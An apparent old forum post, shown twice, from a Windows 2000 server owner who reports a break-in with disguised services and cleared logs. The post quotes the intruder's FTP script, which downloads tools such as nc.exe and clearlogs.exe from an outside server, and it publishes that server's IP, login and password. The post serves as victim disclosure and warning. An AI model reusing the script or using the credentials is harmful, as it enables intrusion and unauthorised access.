K
K.A.
Folks,
Yesterday, a douche bag managed to hack my Windows 2000 server. The hacker
managed to upload some setup files to system32\setup folder. In the setup
folder, he uploaded some scripts. Using the scripts, the hacker downloaded
a few files from his FTP server. He managed to install three Windows
services.
1. Windows logon service (Sounds pretty standard Windows 2000 service). The
program, netstart.exe runs from system32\setup folder.
2. TCP-IP (Sounds normal enough). The program runs from system32\setup
folder.
3. ****-U (This one is not so normal). The program runs from system32\setup
folder.
He also managed to erase my event logs. I have no idea what damage he has
already done. However, I managed to find his foot steps in time. I now
know his IP address, the user id and password to his FTP server. I tried to
report to Microsoft. I wanted to report the incident to Microsoft, so that
they can find out, how the hacker hacked my server, and close any other
vulnerabilities Windows 2000 has. Apparently, Bill (Gate that is) is still
not serious enough about the security. The call went to India. They wanted
to return my call in 3-5 business days. I insisted on talking to someone
higher-up. I got a guy named, Mike, who spoke with Russel Crowe's accent
and asked me to report this incident to local law enforcement authority. As
much a law abiding citizen I am, I know that my local law enforcement will
look at me nothing more than a looney tune. Anyway, folks, here is the
douche bag's FTP server, user id, and password.
This is the script the hacker ran. Note that the ftp server at port 34816.
open 207.67.216.49 34816
scanner2004
nrg-x-crew
binary
lcd C:\winnt\system32\setup
get regsvr32.dll
get TzoLibr.dll
get netstart.exe
get space.txt
get readme.txt
get liesmich.txt
get clearlogs.exe
get syslog.exe
get syslog.ini
get install.cmd
get nc.exe
quit
I am posting to save some of you the aggravation, I went through, and bring
this douche bag to justice.
Regards.
A
Yesterday, a douche bag managed to hack my Windows 2000 server. The hacker
managed to upload some setup files to system32\setup folder. In the setup
folder, he uploaded some scripts. Using the scripts, the hacker downloaded
a few files from his FTP server. He managed to install three Windows
services.
1. Windows logon service (Sounds pretty standard Windows 2000 service). The
program, netstart.exe runs from system32\setup folder.
2. TCP-IP (Sounds normal enough). The program runs from system32\setup
folder.
3. ****-U (This one is not so normal). The program runs from system32\setup
folder.
He also managed to erase my event logs. I have no idea what damage he has
already done. However, I managed to find his foot steps in time. I now
know his IP address, the user id and password to his FTP server. I tried to
report to Microsoft. I wanted to report the incident to Microsoft, so that
they can find out, how the hacker hacked my server, and close any other
vulnerabilities Windows 2000 has. Apparently, Bill (Gate that is) is still
not serious enough about the security. The call went to India. They wanted
to return my call in 3-5 business days. I insisted on talking to someone
higher-up. I got a guy named, Mike, who spoke with Russel Crowe's accent
and asked me to report this incident to local law enforcement authority. As
much a law abiding citizen I am, I know that my local law enforcement will
look at me nothing more than a looney tune. Anyway, folks, here is the
douche bag's FTP server, user id, and password.
This is the script the hacker ran. Note that the ftp server at port 34816.
open 207.67.216.49 34816
scanner2004
nrg-x-crew
binary
lcd C:\winnt\system32\setup
get regsvr32.dll
get TzoLibr.dll
get netstart.exe
get space.txt
get readme.txt
get liesmich.txt
get clearlogs.exe
get syslog.exe
get syslog.ini
get install.cmd
get nc.exe
quit
I am posting to save some of you the aggravation, I went through, and bring
this douche bag to justice.
Regards.
A